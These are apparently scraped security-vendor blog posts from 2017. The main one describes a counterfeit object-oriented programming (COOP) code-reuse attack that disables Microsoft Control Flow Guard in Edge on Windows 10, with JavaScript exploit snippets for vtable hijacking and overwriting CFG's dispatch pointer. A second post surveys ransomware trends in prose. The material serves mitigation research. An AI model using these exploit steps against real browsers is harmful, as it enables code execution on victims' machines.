Disarming Control Flow Guard Using Advanced Code Reuse Attacks

April 25, 2017, 7:04 am

≫ Next: No Experience Required: Ransomware in 2017 and Beyond

≪ Previous: A Primer on North Korean Targeted Digital Attacks

Advanced exploitation is moving away from ROP-based code-reuse attacks. Over the last two years, there has been a flurry of papers related to one novel code-reuse attack, Counterfeit Object-Oriented Programming (COOP). COOP represents a state of the art attack targeting forward-edge control-flow integrity (CFI), and caught our attention in 2016 as we were integrating our CFI solution (HA-CFI) into our endpoint product. COOP largely remains in academia, and has yet to show up in exploit kits. This may be because attackers migrate towards a path of least resistance. In the case of Microsoft Edge on Windows 10 Anniversary Update, protected by Control Flow Guard (CFG), that path of least resistance is the absence of backward-edge CFI. But what happens when Return Flow Guard (RFG) emerges and the attacker can no longer rely on corrupting a return address on the stack?

We were curious to evaluate COOP against modern CFI implementations. This not only is a useful exercise to keep us on top of cutting-edge research in academia and the hacking community, but it also allows us to measure the effectiveness, alter the design, or generally improve upon our own mitigations when necessary. This first of our two-part blog series covers our adventures evaluating COOP function-reuse attacks against Microsoft’s CFG and later our own HA-CFI.

Microsoft Control Flow Guard

There have been a number of papers, blogs, and conference talks already discussing Microsoft’s Control Flow Guard (CFG) at length. Trail of Bits does an excellent job of comparing Clang CFI and Microsoft CFG in two recent posts. The first post focuses on Clang, the second emphasizes Microsoft’s implementation of CFI, while additional research provides further detail on the implementation of CFG.

Bypassing CFG has also been a popular subject at security conferences the past few years. Before we cite some notable bypasses it is first important to note that CFI can be further broken down into two types: forward-edge and backward-edge.

Forward-Edge CFI: Protects indirect CALL or JMP sites. Forward-edge CFI solutions include Microsoft CFG and Endgame’s HA-CFI.
Backward-Edge CFI: Protects RET instructions. Backward-edge CFI solutions would include Microsoft Return Flow Guard, components of Endgame’s DBI exploit prevention, as well as other ROP detections including Intel’s CET.

This categorization helps delineate what CFG is designed to protect – indirect call sites – and what it’s not meant to protect – the return stack. For instance, a recent POC ended up in exploit kits targeting Edge using a R/W primitive to modify a return address on the stack. This is not applicable to CFG, and should not be considered a weakness of CFG. If anything, it demonstrates CFG successfully pushing attackers to hijack control flow somewhere other than at indirect call sites. Examples that actually demonstrate flaws or limitations of CFG include: leveraging unprotected call sites, remapping read-only memory regions containing CFG code pointers and changing them to point to code that always passes a check, a race condition with the JIT encoder in Chakra, and using memory-based indirect calls. COOP or function-reuse attacks in general are an acknowledged limitation for some CFI implementations and noted as out-of-scope for Microsoft’s bypass bounty due to“limitations of coarse-grained CFI”. That said, we are not aware of any public domain POCs that demonstrate COOP to specifically attack CFG hardened binaries.

CFG adds a __guard_fids_table to each protected DLL, composed of a list of RVAs of valid or sensitive targets for indirect call sites within the binary. An address is used as an index into a CFG bitmap, where bits can be toggled depending upon whether the address should be a valid destination. An API also exists to modify this bitmap, for example, to support JIT encoded pages: kernelbase!SetProcessValidCallTargets which invokes ntdll!SetInformationVirtualMemory before making the syscall to update the bitmap.

A new enhancement to CFG in Windows 10 Creators Update enables suppression of exports. In other words, exported functions can now be marked as invalid target addresses for CFG protected call sites. The implementation of this requires using a second bit for each address within the CFGBitmap, as well as a flags byte in the __guard_fids_table for each RVA entry when building the initial per process bitmap.

For 64-bit systems, bits 9-63 of the address are used as an index to retrieve a qword from the CFG bitmap, and bits 3-10 of the address are used (modulo 64) to access a specific bit within the qword. With export suppression, the CFG permissions for a given address are represented by two bits in the CFG bitmap. Additionally, __guard_dispatch_icall_fptr in most DLLs is now set to point to ntdll!LdrpDispatchUserCallTargetES where a valid call target must omit ‘01’ from the CFG bitmap.

Image may be NSFW.
Clik here to view.

Implementing this new export suppression feature becomes a bit complicated when you factor in dynamically resolving symbols, since using GetProcAddress implies subsequent code may invoke the return value as a function pointer. Control Flow Guard handles this by changing the corresponding two-bit entry in the CFG bitmap from ‘10’ (export suppressed) to ‘01’ (valid call site) as long as the entry was not previously marked as sensitive or not marked valid at all (e.g. VirtualProtect, SetProcessValidCallTargets, etc.). As a result, some exports will begin as invalid indirect call targets on process creation, but eventually become a valid call target due to code at runtime. This is important to remember later in our discussion. For reference, a sample call stack when this occurs looks as follows:

00 nt!NtSetInformationVirtualMemory

01 nt!setjmpex

02 ntdll!NtSetInformationVirtualMemory

03 ntdll!RtlpGuardGrantSuppressedCallAccess

04 ntdll!RtlGuardGrantSuppressedCallAccess

05 ntdll!LdrGetProcedureAddressForCaller

06 KERNELBASE!GetProcAddress

07 USER32!InitializeImmEntryTable

COOP Essentials

Schuster et al. identified counterfeit object-oriented programming (COOP) as a potential weakness to CFI implementations. The attack sequences together and reuses existing virtual functions in order to execute code while passing all forward-edge CFI checks along the way. In a similar manner to ROP, the result is a sequence of small valid functions that individually perform minimal computation (e.g. load a value into RDX), but when pieced together perform some larger task. A fundamental component of COOP is to leverage a main loop function, which might iterate over a linked-list or array of objects, invoking a virtual method on each object. The attacker is then able to piece together “counterfeit” objects in memory, in some cases overlapping the objects, such that the main loop will call valid virtual functions of the attacker’s choosing in a controlled order. Schuster et al. demonstrated the approach with COOP payloads targeting Internet Explorer 10 on Windows 7 32-bit and 64-bit, and Firefox on Linux 64-bit. The research was later extended, demonstrating that recursion or functions with many indirect call invocations could also be used instead of a loop, and extended yet again into targeting the Objective-C runtime.

This prior research is extremely interesting and novel. We wanted to apply the concept to some modern CFI implementations to assess: a) the difficulty of crafting a COOP payload in a hardened browser; b) whether we could bypass CFG and HA-CFI; and c) whether we could improve our CFI to detect COOP style attacks.

Our Target

Our primary target for COOP was Microsoft Edge on Windows 10, as it represents a fully hardened CFG application, and allows us to prepare our COOP payload in memory using JavaScript. While vulnerabilities are always of interest to our team, for this effort we focus on the hijack of control flow with CFI in place, and make the following assumptions as an attacker:

An arbitrary read-write primitive is obtained from JavaScript.
Hardcoded offsets are allowed, as dynamically finding gadgets at run-time is out of scope for this particular effort.
All of Microsoft’s latest mitigations in Creators update are enabled (e.g. ACG, CIG, CFG with export suppression).
The attacker must not bypass or avoid CFG in any way other than using COOP.

For our initial research, we leveraged a POC from Theori for Microsoft Edge on Windows 10 Anniversary update (OS build 14393.953). However, we designed our payload with Creators update mitigations in mind, and validated our final working COOP payload on Windows 10 Creators update (OS build 15063.138) with export suppression enabled.

An ideal POC would execute some attacker shellcode or launch an application. A classic code execution model for an attacker is to map some controlled data in memory as +X, and then jump to shellcode in that newly modified +X region. However, our real goal is to generate COOP payloads that execute something meaningful while protected by forward-edge CFI. Such a payload provides data points with which we can test and refine our own CFI algorithms. Further, attacking Arbitrary Code Guard (ACG) or the child process policy in Edge is slightly out of scope. We decided an acceptable end goal for our research on Windows 10 Creators Update was to use COOP to effectively disable CFG, opening up the ability to then jump or call any arbitrary location within a DLL. We thus ended up with two primary COOP payloads:

For Windows 10 Anniversary Update, and a lack of ACG, our payload maps data we control as executable, and then jumps into that region of controlled shellcode after disabling CFG.
For Windows 10 Creators Update, our end goal was to simply disarm CFG.

Finding COOP Gadgets

Following the blueprint left by Schuster et al., our first order of business was to agree upon a terminology for the various components of COOP. The academic papers refer to each reused function as a virtual function gadget or vfgadget, and when describing each specific type of vfgadget an abbreviation is used such as ML-G for a main loop vfgadget. We opted to name each type of gadget in a more informal way. Terms you find in the remaining post are defined here:

Looper: the main loop gadget critical to executing complex COOP payloads (ML-G in paper)
Invoker: a vfgadget which invokes a function pointer (INV-G in paper)
Arg Populator: a virtual function which preps an argument, either loading a value into a register (LOAD-R64-G in paper), or moving the stack pointer and/or loading values on the stack (MOVE-SP-G in paper)

Similar to the paper, we wrote scripts to help us identify vfgadgets in a given binary. We utilized IDA Python, and logic helped us find loopers, invokers, and argument populators. In our research, we found that a practical approach to COOP is to chain together and execute a small number of vfgadgets at a time, before returning to JavaScript, repeating the process through additional COOP payloads as needed. For this reason, we did not find it necessary to lift binary code to IR for our purposes. However, to piece together an extremely large COOP payload, such as running a C2 socket thread all via reused code, it may require lifting to IR in order to piece together the desired assembly. For each subtype of vfgadget, we defined a list of rules that we used while conducting a search within two of the more fruitful binaries in Edge (chakra.dll and edgehtml.dll). A few of these rules for a looper vfgadget include:

Function present on __guard_fids_table
Contain a loop with exactly 1 indirect call taking 0 arguments
Loop must not clobber argument registers

Image may be NSFW.
Clik here to view.

Of all the classes of vfgadgets, the search for loopers was the most time consuming. Many potential loopers have some restrictions that make it hard to work with. Our hunt for invokers turned up not only vfgadgets for invoking function pointers, but also many vfgadgets that can very quickly and easily populate up to six arguments at once all from a single counterfeit object. For this reason, there are shortcuts available for COOP when attempting to invoke a single API, which completely avoid requiring a loop or recursion, unless a return value is needed. Numerous register populators were found for all argument registers on x64. It is worth mentioning that a number of the original vfgadgets proposed in the Schuster et al. COOP paper from mshtml can still be found in edgehtml. However, we added a requirement to our effort to avoid reusing any of these and instead find all new vfgadgets for our COOP payloads.

COOP Payloads

By triggering COOP from a scripting language, we can actually move some complex tasking out of COOP, since chaining together everything at once can get complicated. We can use JavaScript to our advantage and repeatedly invoke miniature COOP payload sequences. This allows us to move things like arithmetic and conditional operations back to JavaScript, and leave the bare essential function reuse to prepping and invoking critical API’s via COOP. Further, we show an example of this methodology including passing return values from COOP back to JavaScript in our Hijack #1 section discussing how to invoke LoadLibrary.

For brevity, I will only step through one of our simplest payloads. A common theme to all of our payloads is the requirement to invoke VirtualProtect. Since VirtualProtect and the eshims APIs are marked as sensitive and not a valid target for CFG, we have to use a wrapper function in Creators Update. As originally suggested by Thomas Garnier, a number of convenient wrappers can be found in .NET libraries mscoree.dll and mscories.dll such as UtilExecutionEngine::ClrVirtualProtect. Because Microsoft’s ACG prevents creating new executable memory, or changing existing executable memory to become writable, an alternate approach is required. Read-only memory can be remapped as writable with VirtualProtect, so I borrow the technique from a BlackHat 2015 presentation, and remap the page containing chakra!__guard_dispatch_icall_fptr as writable, then overwrite the function pointer to point to an arbitrary place in chakra.dll that contains a jmp rax instruction. In fact, there already exists a function in most DLLs, __guard_dispatch_icall_nop, which is exactly that – a single jmp rax instruction. As a result, I can effectively disable CFG since all protected call sites within chakra.dll will immediately just jump to the target address as if it passed all checks. Presumably one could take this a step further to explore function-reuse to attack ACG. To accomplish this mini-chain, the following is required:

Load mscoree.dll into the Edge process
Invoke ClrVirtualProtect +W on a read-only memory region of chakra.dll
Overwrite __guard_dispatch_icall_fptr to always pass check

As seen from the list of vfgadgets above, edgehtml is an important library for COOP. Thus, the first order of business is to leak the base address for edgehtml as well as any other necessary components, such as our counterfeit memory region. This way the payload can contain hardcoded offsets to be rebased at runtime. Using the info leak bug in Theori’s POC, we can obtain all the base addresses we need.

//OS Build 10.0.14393
var chakraBase = Read64(vtable).sub(0x274C40);
var guard_disp_icall_nop = chakraBase.add(0x273510);
var chakraCFG = chakraBase.add(0x5E2B78); //_guard_dispatch_icall...
var ntdllBase = Read64(chakraCFG).sub(0x95260);

//Find global CDocument object, VTable, and calculate EdgeHtmlBase
var [hi, lo] = PutDataAndGetAddr(document);
CDocPtr = Read64(newLong(lo + 0x30, hi, true));
EdgeHtmlBase = Read64(CDocPtr).sub(0xE80740);

//Rebase our COOP payload
rebaseOffsets(EdgeHtmlBase, chakraBase, ntdllBase, pRebasedCOOP);

Triggering COOP

A key part of using COOP is the initial transition from JavaScript into a looper function. Using our assumed R/W primitive, we can easily hijack a vtable in chakra to point to our looper, but how do we ensure the looper then begins iterating over our counterfeit data? For that answer we need to evaluate the looper, which I chose as CTravelLog::UpdateScreenshotStream:

Image may be NSFW.
Clik here to view.

Notice in the first block before the loop, the code is retrieving a pointer to a linked list at this + 0x30h. In order to properly kick off the looper, we must both hijack a JavaScript object’s vtable to include the address to our looper, and then place a pointer at object + 0x30 to point to the start of our counterfeit object list. The actual counterfeit object data can be defined and rebased entirely in JavaScript. Also notice the loop is iterating over a list with a next pointer at object + 0x80h. This is important when crafting our counterfeit object stream. Additionally, notice the vtable offset for this indirect call site is +0xF8h. Any fake vtable in our counterfeit objects must all point to the address of the desired function pointer minus 0xF8h, which often will be in the middle of some neighboring vtable. To kickoff our COOP payload, I chose to hijack a JavascriptNativeIntArray object and will specifically override the freeze() and seal() virtual functions as follows.

var hijackedObj = new Array(0);

[hi, lo] = PutDataAndGetAddr(hijackedObj);

var objAddr = new Long(lo, hi, true);

Write64(objAddr.add(0x30), pRebasedCOOP);

Write64(objAddr, pFakeVTable);

Object.seal(hijackedObj); //Trigger initial looper

Image may be NSFW.
Clik here to view.

Hijack #1: Invoking LoadLibrary

As previously stated, my end goal was bypassing CFG on Edge on Win10 Creators update with export suppression enabled. Looking at the various LoadLibrary calls exported in kernel32 and kernelbase, it turns out loading a new DLL into our process is rather easy even with the latest CFG feature in place. The reason for this is two-fold. First, LoadLibraryExW is actually marked as a valid call target in the __guard_fids_table within kernel32.dll.

Image may be NSFW.
Clik here to view.

Second, the rest of the LoadLibrary calls within both kernel32 and kernelbase start out as suppressed, but in Edge they eventually become valid call sites. This appears to stem from some delayed loading in MicrosoftEdgeCP!_delayLoadHelper2, which eventually results in GetProcAddr being called on the LoadLibraryX APIs. As foreshadowed earlier, this demonstrates the difficulty of making all function exports invalid call targets. Even if these other LoadLibrary call gates remained suppressed or were only opened temporarily, for our purposes we can just use kernel32!LoadLibraryExW since it’s initialized as a valid target.

To get our desired VirtualProtect wrapper loaded into the Edge process, we need to invoke LoadLibraryExW(“mscoree.dll”, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32). We could cut corners here, and leverage one of the aforementioned invokers to populate all of our parameters at once, but instead let’s create a traditional COOP payload using a looper vfgadget to iterate over four counterfeit objects.

Image may be NSFW.
Clik here to view.

Our first iteration will populate r8d with 0x800. CHTMLEditor::IgnoreGlyphs is a nice vfgadget to populate r8d as seen in the assembly below. Our parameter 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32) will be loaded from this + 0xD8h. Recall that the next pointer in our counterfeit objects must be at +0x80h. We could create four contiguous counterfeit objects in memory to each be of size greater than 0xD8h, or we could treat the next pointer to be located at the end of our object. I chose the latter. In this case, we will have an overlapping object so we must be careful that the offset of this + 0xD8 does not interfere with the vfgadget from our second iteration that operates on the second object in memory. The first counterfeit object for populating r8d looks as follows:

Image may be NSFW.
Clik here to view.

Upon return from this vfgadget, the looper then iterates over our fake linked list and must now invoke another vfgadget this time to populate rdx with a value of 0x0 (NULL). To achieve this I use Tree::ComputedRunTypeEnumLayout::BidiRunBox::RunType(). We can load our value (0x0) from our counterfeit object + 0x28h.

Image may be NSFW.
Clik here to view.

Now that we have populated parameters 2 and 3 for our API call, we need to populate the first argument, a pointer to our ‘mscoree.dll’ string, and then invoke a function pointer to LoadLibraryExW. A perfect invoker vfgadget exists for this purpose, Microsoft::WRL::Details::InvokeHelper::Invoke(). The assembly and corresponding third counterfeit object are as follows:

Image may be NSFW.
Clik here to view.

Now that LoadLibraryExW has been called, and hopefully mscoree.dll loaded into our process, we need to get the return address back to JavaScript to rebase additional COOP payloads. Both the looper and CFG make use of RAX for the indirect branch target, so we need to find another way to get the virtual address for the newly loaded module back to JavaScript. Fortunately, upon exiting LoadLibraryExW, RDX also contains a copy of the module address. Therefore, we can tack on one final vfgadget to our object list in order to move RDX back into our counterfeit object memory region. For the final iteration of our loop, we will invoke CBindingURLBlockFilter::SetFilterNotify(), which will copy RDX into the address of our current counterfeit object – 0x88h.

Image may be NSFW.
Clik here to view.

The looper then reaches the end of our list, and returns from the hijacked seal() call transferring control back to our JavaScript code. The first COOP payload has completed, mscoree.dll has been loaded into Edge, and we can now retrieve the base address for mscoree from JavaScript in the code snippet below.

//Retrieve loadlibrary return val from coop region

var mscoreebase = Read64(pRebasedCOOP.add(0x128));

alert("mscoree.dll loaded at: 0x" + mscoreebase.toString(16));

Hijack #2: Invoking VirtualProtect Wrapper

Having successfully completed our first COOP payload, we can now rebase a second COOP payload to invoke ClrVirtualProtect on the read-only memory region that contains chakra!__guard_dispatch_icall_fptr in order to make it writable. Our objective is to call ClrVirtualProtect(this, chakraPageAddress,0x1000,PAGE_READWRITE,pScratchMemory). This time we will demonstrate a COOP payload that does not make use of a loop or recursion by using a single counterfeit object to populate all arguments and invoke a function pointer. We’ll use the same invoker vfgadget as before, only this time it is primarily used to move a counterfeit object into rcx.

Image may be NSFW.
Clik here to view.

We hijack the freeze() virtual method from our original JavascriptNativeIntArray to point to Microsoft::WRL::Details::InvokeHelper::Invoke. This vfgadget will move the this pointer based on the address at this + 0x10, and it will treat this+0x18h as a function pointer. Thus, from our R/W primitive in JavaScript, in addition to hijacking the vtable to call this invoker trampoline function, we also need to overwrite the values of the object + 0x10 and + 0x18.

Write64(objAddr.add(0x10), pCOOPMem2);

Write64(objAddr.add(0x18), EdgeHtmlBase.add(0x2DC540));

Object.freeze(objAddr);

Image may be NSFW.
Clik here to view.

Notice that our fake object will load all the required parameters for ClrVirtualProtect, as well as populate the address of ClrVirtualProtect into rax by resolving index +0x100h from another fake vtable. Upon completion, this will map the desired page in chakra.dll to be writable.

Image may be NSFW.
Clik here to view.

At this point we are done with COOP, and our last step is to actually disarm CFG for chakra.dll. We can pick any arbitrary address in chakra.dll that contains the instruction jmp rax. Once this is identified, we use our write primitive from JavaScript to overwrite the function pointer for chakra!__guard_dispatch_icall_fptr to point to this address. This has the effect of NOPing the CFG validation routine, and allows us to hijack a chakra vtable from JavaScript to jump anywhere.

//Change chakra CFG pointer to NOP check

Write64(chakraCFG, guard_disp_icall_nop);

//trigger hijack to 0x4141414141414141

Object.isFrozen(hijackedObj);

As the WinDbg output below illustrates, with CFG now disabled our hijack was successful and the process crashes when trying to jump to the unmapped address 0x4141414141414141. It’s important to point out that we could have made this hijack jump to anywhere in the process address space due to CFG being disabled. By comparison, with CFG in place an exception would have been thrown since 0x4141414141414141 is not valid in the bitmap, and we would have seen the original CFG routine that we swapped out, ntdll!LdrpDispatchUserCallTargetES, in our call stack.

Image may be NSFW.
Clik here to view.

Conclusion

In this post, I discussed COOP, a novel code-reuse attack proposed in academia, and demonstrated how it can be used to attack modern Control-Flow Integrity implementations, such as Microsoft CFG. Overall, COOP is fairly easy to work with, particularly when breaking up payloads into smaller chains. Piecing together vfgadgets is not unlike the exercise of assembling ROP gadgets. Perhaps the most time consuming portion is finding and labeling candidate vfgadgets of various types within your target process space.

Microsoft’s Control Flow Guard is considered a coarse-grained CFI implementation and is thus more vulnerable to function reuse attacks such as described here. By comparison, fine-grained CFI solutions are able to validate call sites beyond just the target address considering elements such as expected VTable type, validating number of arguments, or even argument types, for a given indirect call. A key tradeoff between the two approaches is performance, as introducing too much complexity into a CFI policy can add significant overhead. Nonetheless, mitigating advanced code-reuse attacks is important moving forward as applications become hardened with some form of forward-edge and backward-edge CFI.

To offset some of the limitations of CFG, Microsoft appears to be focused on diversifying its preventions such as protecting critical call gates like VirtualProtect with export suppression in CFG and Arbitrary Code Guard. However, one important takeaway from this post should be the challenges of designing and enforcing mitigations from user-space. As we saw with EMET a couple of years ago, researchers were able to disarm EMET by reusing code inserted by EMET itself. Further, as was originally demonstrated at BlackHat 2015, here we are similarly taking advantage of critical CFG function pointers residing in user-space to alter the behavior of CFG.

By comparison, Endgame’s HA-CFI solution is implemented and enforced entirely from the kernel and uses hardware features that even if vulnerable to function reuse attacks, make it more difficult to tamper with because of the privilege separation. In the second part of this series, I will discuss the COOP adventures with our own HA-CFI and ongoing research, and how our detection logic evolves to account for advanced function reuse attacks.

↧

No Experience Required: Ransomware in 2017 and Beyond

May 1, 2017, 7:19 am

≫ Next: Cyber Attacks, Bots and Disinformation in the French Election

≪ Previous: Disarming Control Flow Guard Using Advanced Code Reuse Attacks

Much to the chagrin of the computer security industry, business executives, and people around the world, ransomware had a banner year in 2016. Hospitals, mass transit systems, hotels, and government offices have all fallen victim to widespread ransomware infections that significantly degraded their capabilities and held their data hostage for significant periods of time. In response, the security community continues to commit significant resources to fight this family of threats, and are beginning to produce some promising results. However, despite these investments and advances, ransomware continues to proliferate and evolve at an accelerating rate, bringing in an estimated $1,000,000,000 in 2016.

While it is difficult to fully predict the evolution of ransomware, a review of recent trends in ransomware, malware, and the computer industry as a whole provides useful insights into what the future may hold, and allow us to better prepare for upcoming advances.

What's New in Ransomware?

As we wrote last year when revealing the existence of a new version of TeslaCrypt, ransomware has expanded to a much broader audience than in previous years. Widespread spam campaigns and drive-by downloads facilitated by exploit kits helped attackers initiate an estimated 638 million ransomware attacks in 2016, a significant increase from an estimated 3.8 million attacks in 2015.

Image may be NSFW.
Clik here to view.

Timeline of the Growth of Ransomware

Operating System Targets

Though Mac and Linux-based ransomware has been spotted in the wild, a vast majority of ransomware is Windows-based, as it is still the dominant operating system for personal computer end users. Ransomware attackers will continue to primarily target Windows until other operating systems catch up in market share, as the case has always been for malware in general. Mobile ransomware is a potential growing threat, but Apple and Google have largely kept it in check by keeping their operating systems regularly updated and reviewing submissions to their respective application stores.

Ransomware targeted against Internet of Things (IoT) devices is another potential area of growth. Most electronic household appliances now have wireless network connectivity. Juicers, weight scales, fridges, and toilets are among the devices that now offer connectivity and, thus, have the potential to be compromised on your home network. While connectivity may seemingly provide valuable extended functionality, these devices further expand your network footprint and may be more vulnerable to exploitation than your laptops and mobile phones.

Image may be NSFW.
Clik here to view.

The Satis smart toilet released in Japan in 2013 was found to have an insecure default configuration that potentially allowed for remote access to attackers via a Bluetooth mobile app

So, are we all about to be subjected to a wave of ransomware that prevents you from flushing your toilet? Will ransomware disable your thermostat? Will ransomware burn your toast?

The most likely answer to all of these is... possibly. Ransomware has become so prevalent primarily due to its simplicity: attackers just need their payloads to execute on as many hosts as possible. Since most IoT devices tend to run some flavor of Linux and custom software that is optimized for their specific use case, the expected financial gains currently do not appear to justify the work involved to successfully target these devices. These devices also are not easily targeted in the same manner as ransomware attackers tend to distribute their payloads: spear phishing and drive-by downloads. Additionally, these devices do not typically contain the same type of valuable user data that elicits ransom payments from victims. Nevertheless, these devices are not immune to compromise and tend to be less secure than PCs and mobile platforms due to default security configurations as well as the inconvenience of downloading and applying software security updates. The Mirai botnet in particular demonstrated how susceptible to attack IoT devices are across the world. Once an attacker successfully derives greater monetary value from deploying ransomware to IoT devices instead of utilizing them as part of a botnet, other copycat attacks could subsequently follow. It is an almost certainty that these devices will continue to be compromised and added to even larger botnets and subsequently leveraged in further distributed denial of service (DDoS) attacks.

Motivations

While monetary compensation is the overwhelming driver for ransomware attacks, the RanRan ransomware family that appears to be perpetuated by political dissidents in the Middle East points to attackers with differing motivations becoming more involved in the creation and use of ransomware. Dissidents and hacktivists looking to spread a message could find an audience through ransomware attacks, especially if they are successful and reported in the media.

Though disk wiping malware is typically associated with efforts to sabotage an organization, there have been recent reports of families of this type of malware now being modified to behave like ransomware by encrypting files and soliciting ransom payments from their victims. This combination of financial and destructive objectives puts the attackers in a unique position: they’re passing on the opportunity to outright destroy the data of their purported enemies in favor of making the data temporarily inaccessible in the hopes of procuring a ransom. As is the case with all ransomware attacks, there’s no guarantee that the perpetrators would make good on their promise in the event a ransom payment is actually made.

Technical Advances and Lower Barrier of Entry

Through our research, we have identified six key trends pertaining to ransomware that helped lead to both advances in capabilities by more skilled and experienced developers as well as the proliferation of ransomware through enabling less sophisticated attackers to become involved in its creation and distribution.

Exploit Kits Dropping Ransomware Payloads

Exploit kits have been around for over a decade, but the attackers leveraging them have started to alter their tactics due to the potential for easy and quick profits. Whereas before the ultimate goal for attackers leveraging an exploit kit would likely be to install botnet software and/or remote access tools (RATs) for spying on users and collecting credentials/personally identifiable information (PII), ransomware is being served up as the intended payload for these kits with increasing frequency. For example, in February 2016, the web site of a hospital in Ontario was hacked and subsequently modified to infect users with a variant of TeslaCrypt via the Angler exploit kit.

As new exploit kits continue to pop up and split off from or replace older kits, attackers will likely continue to use ransomware variants as part of their payloads to maintain a steady revenue stream due to their relative lack of sophistication. If attackers must choose between deploying ransomware and collecting/monetizing credentials and PII, they will likely continue to prefer the more straightforward and quicker attack scenario of ransomware versus the more conservative long con.

Ransomware Kits and Ransomware as a Service

The success of exploit kits and malware as a service has led to equivalent ransomware-based offerings sprouting up. Ransomware kits and ransomware as a service offerings provide an even lower barrier of entry for prospective criminal attackers that want to get started in producing and distributing their own ransomware variants. A subset of users of Microsoft Office 365 were infected in June 2016 with a variant of Cerber, a well known ransomware as a service offering. The developers behind these offerings have gone to great lengths in marketing to potential customers on youtube, and even openly host their own sites.

Image may be NSFW.
Clik here to view.

Official web site of The Rainmaker Labs, developers of Philadelphia and Stampado ransomware

The division of labor between the developers of kits and service offerings and ransomware attackers provides a mutually beneficial arrangement: developers continue to churn out more advanced ransomware while attackers focus on targeting new victims without needing to worry about the inner workings of the ransomware they are distributing. Both parties are also able to maintain their own steady revenue streams: sales of the ransomware keep the developers happy while the attackers collect cryptocurrency ransoms from their victims.

Image may be NSFW.
Clik here to view.

Philadelphia is a notorious Ransomware as a Service offering that has been known to target the healthcare industry, among others

As less sophisticated and technical attackers continue to become involved in the distribution of ransomware, kits and service offerings will likely continue to evolve to meet their needs and enable them to target victims and collect ransoms even more quickly.

Open Source/Educational ransomware

Like other areas within the computer security industry, ransomware has seen its fair share of proof of concept/open source projects that have been published for the public, such as:

Though these efforts are meant to further research in the field and provide insight into how ransomware works under the hood, attackers have leveraged these projects to produce their own variants. For these attackers, they already have a fully functional codebase, so only minor changes are required to get their own variants up and running. In March 2016, a variant of the EDA2 open source ransomware project infected users via a link posted on a YouTube video. The availability of these projects in open source channels also provides additional camouflage in terms of attribution.

ShinoLocker Educational Ransomware Demo Video

As security researchers work to devise more advanced methods for detecting and preventing ransomware, more open source ransomware projects will spring up to provide platforms for generating samples for testing and educational purposes. Ransomware attackers will continue to leverage these open source and educational platforms for their own destructive goals for the foreseeable future.

Offline Ransomware

Ransomware variants that do not require an Internet connection to be fully functional are fairly prevalent. These variants do not require any command and control infrastructure, thus lowering the attacker’s footprint on the Internet and within their victims' networks. Also, since offline ransomware does not require any network functionality, their binaries/codebase can be further condensed and potentially appear less malicious to antivirus and endpoint protection detection mechanisms. A variant of the Dharma offline ransomware family was used to attack a horse racing web site based in India in January 2017.

Below are examples of offline ransomware families that the Endgame TRAP unit has observed throughout extensive testing:

Cancer
Chimera
CryptConsole
CryptoLocker
CryptoMix
CryptoShield
Crysis
Dharma
DirtyDecrypt
DMALocker
FakeGlobe
Fantom
FireCrypt
Globe
GlobeImposter
Gpcode
Jigsaw
Kangaroo
Koovola
PowerWare
RansomPlus
Rokku
Sage
Simple Encoder
Spora
TeslaCrypt
Unlock92
Xlocker
Xorist
Zyka

Though standing up ephemeral network infrastructure is easier than it has ever been thanks to an expanding range of cloud-based offerings, offline ransomware will likely continue to increase in prevalence due to the lack of a need for command and control endpoints.

Fileless Attacks

As malware authors devise new and innovative means for circumventing endpoint protection mechanisms, "fileless" malware has seen an uptick in usage due to its ephemeral nature and ease in both development and deployment. It should come as no surprise, then, that fileless ransomware has gained traction recently. PowerWare and RAA are among the more notable examples of fileless ransomware that have appeared since 2016. In March 2016, an unnamed healthcare organization was the target of an unsuccessful spearphishing campaign that employed PowerWare. These ransomware variants are just as capable as those developed in lower level programming languages and distributed as executables, but they are more easily customizable and portable thanks to their scripting language frameworks.

PowerShell, VBA, JavaScript, and other native Windows scripting languages that play key roles (e.g. downloader, dropper, environment detection) in typical fileless attacks also frequently serve the same purpose in setting up both fileless and typical executable-based ransomware attacks. Until they are routinely detected and prevented by a majority of current AV and endpoint protection products, fileless attacks will continue to serve as key components of ransomware attacks.

Raw Disk Ransomware

Though it is not a new threat, ransomware that encrypts, replaces, or degrades individual disk drive sectors (rather than or in addition to individual files) such as the Master Boot Record (MBR) or the Master File Table (MFT) did not see much use until 2016. Most ransomware variants target user documents (e.g. DOC, PDF, XLS) while avoiding system critical executable files (e.g. EXE, DLL, SYS) to keep the operating system stable and semi-operational. This allows victims to properly assess the damage and subsequently pay their ransom in order to retrieve their files.

Image may be NSFW.
Clik here to view.

Petya Bootloader Red Screen of Death

With ransomware variants that target disk drive sectors, such pleasantries are not possible. If the startup disk drive is successfully targeted by one of these variants, users will likely be unable to even properly access the operating system, as the ransomware will have replaced the startup routine contained within the MBR with their own custom bootloader. These bootloaders will simply display a ransom note and prevent the user from proceeding further. A variant of the HDDCryptor raw disk ransomware family was used in the attack on the San Francisco Municipal Transportation Agency in late November 2016.

Image may be NSFW.
Clik here to view.

Petya Ransomware Ransom Note and Instructions

The following ransomware families that target raw disk drive sectors all were discovered in 2016:

HDDCryptor/Mamba (January 2016)
Petya (March 2016)
Satana (June 2016)

These types of ransomware variants are potentially much more catastrophic to end users than typical file-based encryption ransomware since they have fewer options for potentially remediating the attack (e.g. volume shadow copies, network or external media-based file backups). Since the operating system has likely been overwritten and encrypted, users are left to assume that none of their files are recoverable. Depending on the success of these variants in soliciting ransom payments from their victims, ransomware attackers may develop advancements in an effort to further infect hard disk drives, the system BIOS, and other low level system components.

Conclusion

Unfortunately, ransomware does not appear to be going away anytime soon. As long as the risk to reward ratio remains in favor of ransomware, we are likely to see continued growth and creativity from its developers and attackers. In order to protect themselves from the effects of ransomware, users are highly encouraged to secure their hosts with a fully featured endpoint security product and maintain regular offline backups of their most important documents that may be susceptible to loss during ransomware attacks.

As for what to expect, there likely will be further developments in ransomware for MacOS, Linux, mobile platforms, and possibly IoT devices. Exploit kits, ransomware kits, ransomware as a service offerings, and open source ransomware will continue to be leveraged by less sophisticated attackers and help them grow their budding criminal enterprises. Fileless ransomware will see more usage as attackers attempt to evade endpoint protection mechanisms. Offline ransomware will continue to be used by attackers wishing to minimize their footprint. And last, but certainly not least, expect to see more advanced ransomware that targets the MBR, MFT, and other raw disk drive sectors. In the coming weeks, I'll have a follow-on post to walk through how the Endgame research team is addressing these advances in ransomware. Stay tuned!

↧

Cyber Attacks, Bots and Disinformation in the French Election

May 9, 2017, 7:28 am

≫ Next: Augmenting Analysts: To Bot or Not?

